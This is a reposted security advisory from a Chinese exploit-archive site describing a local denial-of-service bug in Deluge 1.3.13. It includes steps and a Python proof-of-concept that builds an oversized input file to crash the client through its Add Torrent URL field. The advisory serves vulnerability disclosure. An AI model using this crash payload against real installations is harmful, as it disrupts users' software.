首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Deluge 1.3.13 - Denial Of Service Vulnerability
来源:www.zwx.fr 作者:ZwX 发布时间:2016-10-25  
[#] Technical Details & Description:
====================================
A denial of service vulnerability is detected in the official Deluge v1.3.13 - Software.
Local attackers can crash the software process via denial of service vulnerability.
  
Vulnerable Module(s):
                        [+]  Fiel > Add torrent > Url > Name of the window "Since the Internet address" > URL (Input)
  
  
[#] Proof of Concept (PoC):
===========================
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
  
Manual steps to reproduce the local vulnerability ...
1. Run the script in python
2. Run the software Deluge.exe
3. Click `file`,` Add Torrent`, `Url`
4. Copy the characters that it is in the file `PoC.txt`
5. Glue the input characters in `URL` and click confirm
6. The crash software with success
  
-- PoC Exploit Python --
  
#!/usr/bin/python
  
junk = "\x41" * 6000
junk1 = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
exploit = junk + junk1
  
try:
    print "[+] Creating POC"
    crash = open('PoC.txt','w');
    crash.write(exploit);
    crash.close();
except:
    print "[-] No Permissions.."
  
  
[+] Disclaimer [+]
===================
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
  
  
Domain:     www.zwx.fr
Contact:    msk4@live.fr        
Social:     twitter.com/XSSed.fr
Feeds:      www.zwx.fr/feed/
Advisory:   www.vulnerability-lab.com/show.php?user=ZwX
            packetstormsecurity.com/files/author/12026/
            cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
            0day.today/author/27461

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TrendMicro InterScan Web Secur
·WordPress Userpro Remote File
·Oracle VM VirtualBox 4.3.28 -
·Panda Security PSEvents Privil
·Linux Kernel 2.6.22 < 3.9 (x86
·Microsoft Windows x86 NDISTAPI
·FreePBX 10.13.66 - Remote Comm
·Network Scanner 4.0.0 - SEH Lo
·Linux Kernel 2.6.22 < 3.9 - 'D
·WSearch service (windows) - pe
·Windows - NtLoadKeyEx Read Onl
·SmallFTPd 1.0.3 - 'mkd' Comman
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved